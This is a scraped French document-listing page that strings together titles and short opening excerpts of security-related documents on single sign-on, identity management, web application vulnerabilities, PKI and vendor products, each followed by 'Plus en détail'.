La haute disponibilité de la CHAINE DE Pare-feu, proxy, antivirus, authentification LDAP & Radius, contrôle d'accès des portails applicatifs La haute disponibilité de la CHAINE DE SECURITE APPLICATIVE 1.1 La chaîne de sécurité applicative est

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web Rencontres SPIRAL 25/02/03 Vulnérabilités et sécurisation des applications Web Pourquoi les firewalls sont impuissants face à certaines attaques patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com

Plus en détail

Sécuriser l accès aux applications et aux données. Charles Tostain, André Deville, Julien Bouyssou IBM Tivoli Sécurité

Sécuriser l accès aux applications et aux données. Charles Tostain, André Deville, Julien Bouyssou IBM Tivoli Sécurité Sécuriser l accès aux applications et aux données Charles Tostain, André Deville, Julien Bouyssou IBM Tivoli Sécurité 2 Agenda Gérer les identités : pourquoi et comment? Tivoli Identity Manager Express

Plus en détail

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Pourquoi revoir la sécurité des applications Web Des technologies omniprésentes Facilité de mise en œuvre et de déploiement. Commerce en ligne,

Plus en détail

TAM esso Signature Unique

TAM esso Signature Unique TAM esso Signature Unique IBM Tivoli Access Manager for Entreprise Single Sign On Charles TOSTAIN Agenda Enjeux du marché de la sécurité L offre Sécurité IBM : Quelle architecture? Tivoli Access Manager

Plus en détail

La sécurité dans les grilles

La sécurité dans les grilles La sécurité dans les grilles Yves Denneulin Laboratoire ID/IMAG Plan Introduction les dangers dont il faut se protéger Les propriétés à assurer Les bases de la sécurité Protocoles cryptographiques Utilisation

Plus en détail

Groupe Eyrolles, 2004 ISBN : 2-212-11504-0

Groupe Eyrolles, 2004 ISBN : 2-212-11504-0 Groupe Eyrolles, 2004 ISBN : 2-212-11504-0 Table des matières Avant-propos................................................ 1 Quel est l objectif de cet ouvrage?............................. 4 La structure

Plus en détail

Next Generation Application Security. Catalogue des formations

Next Generation Application Security. Catalogue des formations Next Generation Application Security Catalogue des formations Nbr de jours Janvier Février Mars Avril Mai Juin Juillet Août Septembre Octobre Novembre Décembre PLANNING DES FORMATIONS 2015 Denyall Web

Plus en détail

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse

Plus en détail

Projet Sécurité des SI

Projet Sécurité des SI Projet Sécurité des SI «Groupe Défense» Auteurs Candide SA Diffusion: limitée Type de document Compte rendu Projet Sécurité Destinataires P. LATU Date 14/12/09 M2 STRI Version 1.2 Introduction Sous-traitance

Plus en détail

Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web»

Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web» Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web» 1 OBJECTIFS DE LA FORMATION RSSI PUBLIC Administrateur Réseau et Système Consultant sécurité Responsable Développement Développeur

Plus en détail

Didier Perrot Olivier Perroquin In-Webo Technologies

Didier Perrot Olivier Perroquin In-Webo Technologies Comment accéder concrètement, simplement et sans investissement aux bénéfices de l'authentification forte pour vos applications SI ou métier, Cloud, mobile ou web Didier Perrot Olivier Perroquin In-Webo

Plus en détail

TOP 10 DES VULNÉRABILITÉS : RETOUR SUR 5 ANS DE PENTEST

TOP 10 DES VULNÉRABILITÉS : RETOUR SUR 5 ANS DE PENTEST TOP 10 DES VULNÉRABILITÉS : RETOUR SUR 5 ANS DE PENTEST $ WHOAMI ITrust Société toulousaine Expertise en sécurité informatique Activités Service en sécurité (pentest / forensic / formation ) Editeur de

Plus en détail

De l authentification au hub d identité. si simplement. Présentation OSSIR du 14fev2012

De l authentification au hub d identité. si simplement. Présentation OSSIR du 14fev2012 De l authentification au hub d identité si simplement Présentation OSSIR du 14fev2012 Olivier Perroquin In-Webo Technologies Mission et solutions d In-Webo > Apporter aux Entreprises et Opérateurs de Services

Plus en détail

Une Gestion [TITLE] intégrée de la sécurité. Mamadou COULIBALY, Direction Technique et Sécurité Microsoft Afrique du Centre et de l Ouest

Une Gestion [TITLE] intégrée de la sécurité. Mamadou COULIBALY, Direction Technique et Sécurité Microsoft Afrique du Centre et de l Ouest Une Gestion [TITLE] intégrée de la sécurité Mamadou COULIBALY, Direction Technique et Sécurité Microsoft Afrique du Centre et de l Ouest Agenda Contexte et approche de Microsoft Simplifier et étendre la

Plus en détail

La sécurité des PABX Le point de vue d un constructeur Les mesures de sécurisation des équipements lors du développement et de l intégration

La sécurité des PABX Le point de vue d un constructeur Les mesures de sécurisation des équipements lors du développement et de l intégration La sécurité des PABX Le point de vue d un constructeur Les mesures de sécurisation des équipements lors du développement et de l intégration Pierre-Alexandre FUHRMANN Vice-President Global R&D 25 Avril

Plus en détail

Vulnérabilités SCADA/ICS

Vulnérabilités SCADA/ICS Vulnérabilités SCADA/ICS Listing des 10 vulnérabilités les plus fréquemment rencontrées lors de missions Wilfrid BLANC - LEXSI 1 Réalisation de nombreuses missions en contexte industriel depuis 2011 Audit

Plus en détail

Présentation de la solution Open Source «Vulture» Version 2.0

Présentation de la solution Open Source «Vulture» Version 2.0 Présentation de la solution Open Source «Vulture» Version 2.0 Advens IST Day 15 septembre 2011 http://www.vultureproject.org 1 s/apache/mod_perl/ LE PROJET VULTURE Advens IST Day 15 septembre 2011 http://www.vultureproject.org

Plus en détail

PASS v2.0 : solution d authentification unique basée sur les composants Shibboleth Service Provider v2.5.1 et Identity Provider v2.3.

PASS v2.0 : solution d authentification unique basée sur les composants Shibboleth Service Provider v2.5.1 et Identity Provider v2.3. PREM IE R M IN IS T R E Secrétariat général de la défense et de la sécurité nationale Agence nationale de la sécurité des systèmes d information PASS v2.0 : solution d authentification unique basée sur

Plus en détail

Fiches micro-informatique SECURITE LOGIQUE LOGIxx

Fiches micro-informatique SECURITE LOGIQUE LOGIxx Objectif Fiches micro-informatique SECURITE LOGIQUE LOGIxx Présenter des préconisations pour sécuriser le poste de travail informatique et son environnement sous forme de fiches pratiques. Public concerné

Plus en détail

Cible de Sécurité rweb4. Certification Sécurité de Premier Niveau

Cible de Sécurité rweb4. Certification Sécurité de Premier Niveau Cible de Sécurité rweb4 Certification Sécurité de Premier Niveau Version 1.3 26 Février 2013 Table des Matières 1. Identification... 3 1.1 Identification de la cible de sécurité... 3 1.2 Identification

Plus en détail

Gestion des accès et des identités

Gestion des accès et des identités Gestion des accès et des identités Laurent Patrigot Forum Navixia / 30 Septembre 2010 Agenda Présentation de l UER Problématique et Objectifs La solution Evidian IAM Questions L UER (Union Européenne de

Plus en détail

L accès sécurisé. aux données. médicales

L accès sécurisé. aux données. médicales L accès sécurisé aux données médicales Le décret confidentialité N 2007-960 du 15 mai 2007 La responsabilité personnelle des chefs d établissement et des médecins vis-à-vis de la confidentialité des données

Plus en détail

COURS DE FORMATION Dans le cadre du " Réseau des Centres d'excellence"

COURS DE FORMATION Dans le cadre du  Réseau des Centres d'excellence COURS DE FORMATION Dans le cadre du " Réseau des Centres d'excellence" Tunis Tunisie du 28 Septembre au 09 Octobre 2009 Organisé par: la Conférence des Nations Unies sur le Commerce et le Développement

Plus en détail

Fiche Produit ClickNDial

Fiche Produit ClickNDial Fiche Produit ClickNDial Utilitaire de numérotation et client annuaire applications for Cisco Unified Communications Directory Solutions IPS Global Directory Web Directory IPS Popup Personal Directory

Plus en détail

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet REALSENTRY TM Gestion, Performance et Sécurité des infrastructures Web La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet L authentification

Plus en détail

Single Sign On (l apport déterminant du SSO dans un projet d IAM ) Yves RAISIN - biomérieux

Single Sign On (l apport déterminant du SSO dans un projet d IAM ) Yves RAISIN - biomérieux Single Sign On (l apport déterminant du SSO dans un projet d IAM ) Yves RAISIN - biomérieux Sommaire Concepts du SSO Intégration du SSO dans un projet d IAM Spécifications fonctionnelles et techniques

Plus en détail

SÉCURITÉ DES BASES DE DONNÉES SOUS ORACLE

SÉCURITÉ DES BASES DE DONNÉES SOUS ORACLE SÉCURITÉ DES BASES DE DONNÉES SOUS ORACLE SÉCURITÉ DES DONNÉES La sécurité de l information est vitale. Elle conditionne l activité économique des entreprises et la confiance dans les organismes publics

Plus en détail

Gestion et contrôle des accès informatiques

Gestion et contrôle des accès informatiques Gestion et contrôle des accès informatiques Un livre blanc de Bull Evidian Mot de passe unique et gestion centralisée des accès pour les établissements publics et les collectivités territoriales Par Cathy

Plus en détail

Fiche Produit ClickNDial

Fiche Produit ClickNDial Fiche Produit ClickNDial Utilitaire de numérotation et client annuaire pour Cisco CallManager applications for Cisco Unified Communications Directory Solutions IPS Global Directory Web Directory IPS Popup

Plus en détail

Single Sign On. Nicolas Dewaele. Single Sign On. Page 1. et Web SSO

Single Sign On. Nicolas Dewaele. Single Sign On. Page 1. et Web SSO Page 1 Introduction Sommaire I- Présentation de la technologie II- Architectures classiques et étude du marché III- Implémentation en entreprise IV- Présentation de systèmes SSO Annexes Page 2 Introduction

Plus en détail

DAVION Didier 33 avenue Paul Cézanne 59116 HOUPLINES. Auditeur n NPC007570 URBANISATION ET ARCHITECTURE DES SYSTEMES D INFORMATION DOSSIER SSO

DAVION Didier 33 avenue Paul Cézanne 59116 HOUPLINES. Auditeur n NPC007570 URBANISATION ET ARCHITECTURE DES SYSTEMES D INFORMATION DOSSIER SSO DAVION Didier 33 avenue Paul Cézanne 59116 HOUPLINES Auditeur n NPC007570 URBANISATION ET ARCHITECTURE DES SYSTEMES D INFORMATION DOSSIER SSO I. Définition d un SSO Tout à d abord SSO veut dire Single

Plus en détail

Intégration d un poste Linux dans un domaine W2K

Intégration d un poste Linux dans un domaine W2K Intégration d un poste Linux dans un domaine W2K Pascal Gachet EIVD pascal.gachet@eivd.ch mai 2003 Intégration d un poste Linux dans un domaine W2K 2 Table des matières Introduction... 2 Terminologie...

Plus en détail

Profil de protection d un progiciel serveur applicatif MES

Profil de protection d un progiciel serveur applicatif MES Profil de protection d un progiciel serveur applicatif MES Version 1.0 court-terme GTCSI 1 er juillet 2015 Avant-propos Dans toute la suite de ce document, l acronyme ToE (Target of Evaluation) désigne

Plus en détail

MINI-PROJET : ETUDE D UN MECANISME DE REDIRECTION DE PAGES WEB POUR AUTHENTIFIER UN UTILISATEUR WIFI

MINI-PROJET : ETUDE D UN MECANISME DE REDIRECTION DE PAGES WEB POUR AUTHENTIFIER UN UTILISATEUR WIFI Claire Billaud - 3ème année IS MINI-PROJET : ETUDE D UN MECANISME DE REDIRECTION DE PAGES WEB POUR AUTHENTIFIER UN UTILISATEUR WIFI Page 1 sur 9 Principe : On veut faire en sorte que le réseau interne

Plus en détail

et Groupe Eyrolles, 2006, ISBN : 2-212-11747-7

et Groupe Eyrolles, 2006, ISBN : 2-212-11747-7 Tsoft et Groupe Eyrolles, 2006, ISBN : 2-212-11747-7 OEM Console Java OEM Console HTTP OEM Database Control Oracle Net Manager 6 Module 6 : Oracle Enterprise Manager Objectifs Contenu A la fin de ce module,

Plus en détail

Sécurisation en local

Sécurisation en local Attaques locales (internes) Sécurisation en local Indépendamment de la présence d un réseau Espionnage quand même possible Émission électromagnétiques Norme tempest Dispositifs sans fil Clavier/souris

Plus en détail

Cisco Secure Access Control Server Solution Engine. Introduction. Fiche Technique

Cisco Secure Access Control Server Solution Engine. Introduction. Fiche Technique Fiche Technique Cisco Secure Access Control Server Solution Engine Cisco Secure Access Control Server (ACS) est une solution réseau d identification complète qui offre à l utilisateur une expérience sécurisée

Plus en détail

ModSecurity. Cible de sécurité CSPN Version 0.96

ModSecurity. Cible de sécurité CSPN Version 0.96 Cible de sécurité CSPN Version 0.96 TABLE DES MATIERES 1 IDENTIFICATION... 3 1.1 IDENTIFICATION DE LA CIBLE DE SECURITE... 3 1.2 IDENTIFICATION DU PRODUIT... 3 2 ARGUMENTAIRE (DESCRIPTION) DU PRODUIT...

Plus en détail

ENVOLE 1.5. Calendrier Envole

ENVOLE 1.5. Calendrier Envole ENVOLE 1.5 Calendrier Envole RSA FIM 1 avril 2008 V 1.13 sur EOLE V 2.0 1 septembre 2008 EOLE V 2.1 10 octobre 2008 V 1.15 RC sur EOLE V 2.0 Modification du SSO EOLE 2.2 (PAM-CAS, CT EOLE V 2.2 RC Prise

Plus en détail

La gamme Advance UCOPIA. www.ucopia.com

La gamme Advance UCOPIA. www.ucopia.com La gamme Advance UCOPIA www.ucopia.com La gamme UCOPIA Advance est destinée aux organisations moyennes à grandes, déployant sur un ou de nombreux sites, pour l accès à des applications et services critiques,

Plus en détail

Gestion et contrôle des accès informatiques

Gestion et contrôle des accès informatiques Gestion et contrôle des accès informatiques Un livre blanc de Bull Evidian Mot de passe unique et gestion centralisée des accès pour une Chambre de Commerce et d Industrie Par Cathy Demarquois Responsable

Plus en détail

Contrôle d accès Centralisé Multi-sites

Contrôle d accès Centralisé Multi-sites Informations techniques Contrôle d accès Centralisé Multi-sites Investissement et exploitation optimisés La solution de contrôle d accès centralisée de Netinary s adresse à toute structure souhaitant proposer

Plus en détail

Profil de protection d un logiciel d ingénierie

Profil de protection d un logiciel d ingénierie Version 1.0 moyen-terme GTCSI 11 septembre 2015 Avant-propos Dans toute la suite de ce document, l acronyme ToE (Target of Evaluation) désigne le composant qui est l objet de l évaluation. 1 Descriptif

Plus en détail

Vulnérabilités et solutions de sécurisation des applications Web

Vulnérabilités et solutions de sécurisation des applications Web Vulnérabilités et solutions de sécurisation des applications Web Patrick CHAMBET EdelWeb ON-X Consulting patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Eric Larcher RSSI Accor

Plus en détail

La gamme express UCOPIA. www.ucopia.com

La gamme express UCOPIA. www.ucopia.com La gamme express UCOPIA www.ucopia.com UCOPIA s adresse principalement aux petites organisations (Hôtels, PME, Cliniques, Etablissements secondaires...). Produit ayant obtenu en 2010 la Certification de

Plus en détail

SECURITE DES SI ET CYBER SECURITE

SECURITE DES SI ET CYBER SECURITE SECURITE DES SI ET CYBER SECURITE Aziz Da Silva WWW.AZIZDASILVA.NET [Company address] Sommaire du Document Formation : Synthèses et Référentiels... 2 Sécurité et Cyber Sécurité : la synthèse technique

Plus en détail

OWASP Top Ten 2007 Sommaire exécutif

OWASP Top Ten 2007 Sommaire exécutif OWASP Top Ten 2007 Sommaire exécutif Benoit Guerette, gueb@owasp.org Montreal Chapter Leader 24 février 2009 OWASP Education Project Copyright 2007 The OWASP Foundation Permission is granted to copy, distribute

Plus en détail

La GRC en temps de crise, difficile équilibre entre sentiment de sécurité et réduction des coûts

<Insert Picture Here> La GRC en temps de crise, difficile équilibre entre sentiment de sécurité et réduction des coûts La GRC en temps de crise, difficile équilibre entre sentiment de sécurité et réduction des coûts Christophe Bonenfant Cyril Gollain La GRC en période de croissance Gouvernance Gestion

Plus en détail

Evidian IAM Suite 8.0 Identity Management

Evidian IAM Suite 8.0 Identity Management Evidian IAM Suite 8.0 Identity Management Un livre blanc Evidian Summary Evidian ID synchronization. Evidian User Provisioning. 2013 Evidian Les informations contenues dans ce document reflètent l'opinion

Plus en détail

Managed Services Comment décliner la gamme en mode Cloud. Fabienne Druis Offering leader

Managed Services Comment décliner la gamme en mode Cloud. Fabienne Druis Offering leader Managed Services Comment décliner la gamme en mode Cloud Fabienne Druis Offering leader Les services d infogérance autour du Data Center DE APPLICATIONS DES SYSTEMES D INFRASTRUCTURE Intégration en pré

Plus en détail

Vers un nouveau modèle de sécurité

Vers un nouveau modèle de sécurité 1er décembre 2009 GS Days Vers un nouveau modèle de sécurité Gérôme BILLOIS - Manager sécurité gerome.billois@solucom.fr Qui sommes-nous? Solucom est un cabinet indépendant de conseil en management et

Plus en détail

TOP 10 DES VULNÉRABILITÉS : RETOUR SUR 5 ANS DE PENTEST. 10 Décembre 2013 Julien Lavesque j.lavesque@itrust.fr

TOP 10 DES VULNÉRABILITÉS : RETOUR SUR 5 ANS DE PENTEST. 10 Décembre 2013 Julien Lavesque j.lavesque@itrust.fr TOP 10 DES VULNÉRABILITÉS : RETOUR SUR 5 ANS DE PENTEST 10 Décembre 2013 Julien Lavesque j.lavesque@itrust.fr $ WHOAMI Julien Lavesque ü Directeur technique ITrust ü Consultant Sécurité depuis 10 ans ü

Plus en détail

Roman Mkrtchian SI5-2012/2013 François Chapuis. Rapport de projet de WASP. Réalisation d'un site web sécurisé

Roman Mkrtchian SI5-2012/2013 François Chapuis. Rapport de projet de WASP. Réalisation d'un site web sécurisé Roman Mkrtchian SI5-2012/2013 François Chapuis Rapport de projet de WASP Réalisation d'un site web sécurisé Introduction Nous avons choisi de coder un blog sécurisé. Nous avons notamment codé nous-mêmes

Plus en détail

MSP Center Plus. Vue du Produit

MSP Center Plus. Vue du Produit MSP Center Plus Vue du Produit Agenda A propos de MSP Center Plus Architecture de MSP Center Plus Architecture Central basée sur les Probes Architecture Centrale basée sur l Agent Fonctionnalités démo

Plus en détail

Solution de déploiement de certificats à grande échelle. En savoir plus...

Solution de déploiement de certificats à grande échelle. En savoir plus... Solution de déploiement de certificats à grande échelle permet un déploiement des certificats numériques à grande échelle en toute sécurité sans avoir à fournir un support physique (token, carte à puce

Plus en détail

Sécurisation des architectures traditionnelles et des SOA

Sécurisation des architectures traditionnelles et des SOA Sécurisation des architectures traditionnelles et des SOA Un livre blanc de Bull Evidian Gestion SAML des accès SSO aux applications classiques et J2EE. Max Vallot Sommaire Émergence des architectures

Plus en détail

Présentation SafeNet Authentication Service (SAS) Octobre 2013

Présentation SafeNet Authentication Service (SAS) Octobre 2013 Bâtir un environnement d'authentification très fiable Présentation SafeNet Authentication Service (SAS) Octobre 2013 Insérez votre nom Insérez votre titre Insérez la date 1 Présentation de l offre SAS

Plus en détail

FEDERATION DES IDENTITES

FEDERATION DES IDENTITES 1 FEDERATION DES IDENTITES Quel protocole de fédération pour quel usage? OAUTH & SAML Fabrice VAZQUEZ Consultant Sécurité du SI +331 73 54 3000 Cabinet de conseil et d expertise technique en sécurité du

Plus en détail

Tutorial Authentification Forte Technologie des identités numériques

Tutorial Authentification Forte Technologie des identités numériques e-xpert Solutions SA 3, Chemin du Creux CH 1233 Bernex-Genève Tél +1 22 727 05 55 Fax +1 22 727 05 50 Tutorial Authentification Forte Technologie des identités numériques Volume 2/3 Par Sylvain Maret /

Plus en détail

EJBCA Le futur de la PKI

EJBCA Le futur de la PKI EJBCA Le futur de la PKI EJBCA EJBCA c'est quoi? EJBCA est une PKI (Public Key infrastructure) ou IGC (Infrastructure de gestion de clés) sous licence OpenSource (LGPL) développée en Java/J2EE. EJBCA bien

Plus en détail

Vue d'ensemble des groupes dans Active Directory 2003

Vue d'ensemble des groupes dans Active Directory 2003 Vue d'ensemble des groupes dans Active Directory 2003 Charles BARJANSKY Laboratoire Supinfo des Technologies Microsoft Introduction Les administrateurs réseaux, lors de la mise en place d'une nouvelle

Plus en détail

Formation e-commerce Développeur Sécurité

Formation e-commerce Développeur Sécurité Page 1 sur 6 28 bd Poissonnière 75009 Paris T. +33 (0) 1 45 63 19 89 contact@ecommerce-academy.fr http://www.ecommerce-academy.fr/ Formation e-commerce Développeur Sécurité Développeur indépendant ou en

Plus en détail

Lieberman Software Corporation

Lieberman Software Corporation Lieberman Software Corporation Managing Privileged Accounts Ou La Gestion des Comptes à Privilèges 2012 by Lieberman Software Corporation Agenda L éditeur Lieberman Software Les défis Failles sécurité,

Plus en détail

Sécurité dans les développements

Sécurité dans les développements HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Sécurité dans les développements Paris, 11 mai 2007 Hervé Schauer

Plus en détail

Fiche Produit Global Directory pour Jabber

Fiche Produit Global Directory pour Jabber Fiche Produit Global Directory pour Jabber applications for Cisco Unified Communications Directory Solutions IPS Global Directory Web Directory IPS Popup Personal Directory ClickNDial Provisioning Corporate

Plus en détail

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET http://www.chambet.com

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET http://www.chambet.com Urbanisation des SI Conduite du changement IT 20/03/09 Sécuriser ses Web Services Patrick CHAMBET http://www.chambet.com Bouygues Telecom Direction Gouvernance, Outils et Architecture / Sécurité du SI

Plus en détail

La sécurité informatique dans la petite entreprise Etat de l'art et Bonnes Pratiques (2ième édition)

La sécurité informatique dans la petite entreprise Etat de l'art et Bonnes Pratiques (2ième édition) Généralités sur la sécurité informatique 1. Introduction 13 2. Les domaines et normes associés 16 2.1 Les bonnes pratiques ITIL V3 16 2.1.1 Stratégie des services - Service Strategy 17 2.1.2 Conception

Plus en détail

Présentation de la société. Aout 2011

Présentation de la société. Aout 2011 Présentation de la société Aout 2011 En quelques mots SonicWALL Inc, (Nasdaq SNWL), est un leader mondial de solutions intelligentes de sécurité des réseaux et de protection de données. Fournisseur de

Plus en détail

Evidian Secure Access Manager Standard Edition

Evidian Secure Access Manager Standard Edition Evidian Secure Access Manager Standard Edition LDAP SSO un contrôle d accès modulaire et extensible - V 1.1 Par Dominique Castan dominique.castan@evidian.com et Michel Bastien michel.bastien@evidian.com

Plus en détail

CP - NBS System. La sécurité informatique : focus sur les menaces les plus communes et leurs solutions

CP - NBS System. La sécurité informatique : focus sur les menaces les plus communes et leurs solutions La sécurité informatique : focus sur les menaces les plus communes et leurs solutions Nous avons publié en février un article résumant les principaux risques liés au manque de sécurité des sites internet.

Plus en détail

LDAP & Unified User Management Suite

LDAP & Unified User Management Suite LDAP & Unified User Management Suite LDAP - la nouvelle technologie d annuaire sécurisé La Net Economy Quelles conséquences? Croissance explosive du nombre d applications basées sur Internet non administrables

Plus en détail

Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE

Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE Référence : BNX_Cible-de-sécurité_CSPN Version : 1.3 Etat : A valider Date : Affaire/projet : Client : BEE WARE Classification : Diffusion projet Bee Ware i-suite Cible de Sécurité CSPN Validation Fonctionnelle

Plus en détail

Solutions Microsoft Identity and Access

Solutions Microsoft Identity and Access Solutions Microsoft Identity and Access 2 Solutions Microsoft Identity and Access Microsoft Identity and Access (IDA) permet aux entreprises d améliorer leur efficacité et leurs connexions internes et

Plus en détail

Solutions de gestion de la sécurité Livre blanc

Solutions de gestion de la sécurité Livre blanc Solutions de gestion de la sécurité Livre blanc L intégration de la gestion des identités et des accès avec l authentification unique Objectif : Renforcer la politique de sécurité et améliorer la productivité

Plus en détail

Gestion des comptes à privilèges

Gestion des comptes à privilèges 12 décembre 2013 Gestion des comptes à privilèges Bertrand CARLIER, Manager Sécurité de l Information bertrand.carlier@solucom.fr Solucom, conseil en management et système d information Cabinet de conseil

Plus en détail

Samson BISARO Christian MAILLARD

Samson BISARO Christian MAILLARD Une solution d authentification unifiée dans un réseau hétérogène Arnaud ANTONELLI Samson BISARO Christian MAILLARD 1 Sommaire État des lieux en 1999 Objectifs Composants du projet État des lieux en 2005

Plus en détail

Gestion des utilisateurs et Entreprise Etendue

Gestion des utilisateurs et Entreprise Etendue Gestion des utilisateurs et Entreprise Etendue Laurent Ruyssen 6 rue Beaubourg - 75004 PARIS T 1 44 59 93 00 F 1 44 59 93 09 yphise@yphise.com - http://yphise.fr GUEE0009-1 Agenda Entreprise Etendue Mission

Plus en détail

Smart Notification Management

Smart Notification Management Smart Notification Management Janvier 2013 Gérer les alertes, ne pas uniquement les livrer Chaque organisation IT vise à bien servir ses utilisateurs en assurant que les services et solutions disponibles

Plus en détail

Catalogue «Intégration de solutions»

Catalogue «Intégration de solutions» Catalogue «Intégration de solutions» 1 Nos prestations Offre 01 Offre 02 Offre 03 Offre 04 Offre 05 Offre 06 Offre 07 Offre 08 Offre 09 Offre 10 Offre 11 Offre 12 Offre 13 Offre 14 Offre 15 Offre 16 Antivirus

Plus en détail

Perso. SmartCard. Mail distribution. Annuaire LDAP. SmartCard Distribution OCSP. Codes mobiles ActivX Applet. CRLs

Perso. SmartCard. Mail distribution. Annuaire LDAP. SmartCard Distribution OCSP. Codes mobiles ActivX Applet. CRLs HASH LOGIC s e c u r i t y s o l u t i o n s Version 1.0 de Janvier 2007 PKI Server Une solution simple, performante et économique Les projets ayant besoin d'une infrastructure PKI sont souvent freinés

Plus en détail

Ce guide n a pas vocation à se substituer à une démarche de certification PCI DSS.

Ce guide n a pas vocation à se substituer à une démarche de certification PCI DSS. Guide à l attention des développeurs / hébergeurs de sites web marchands sur le niveau minimum de sécurité pour le traitement de numéros de cartes bancaires Préambule Ce guide n a pas vocation à se substituer

Plus en détail

Les risques HERVE SCHAUER HSC

Les risques HERVE SCHAUER HSC HERVE SCHAUER HSC Les risques Les risques ne cessent d'augmenter: Informatisation systématique de l'ensemble de la société Ouverture des systèmes d'information sur Internet Démultiplication de ce qui est

Plus en détail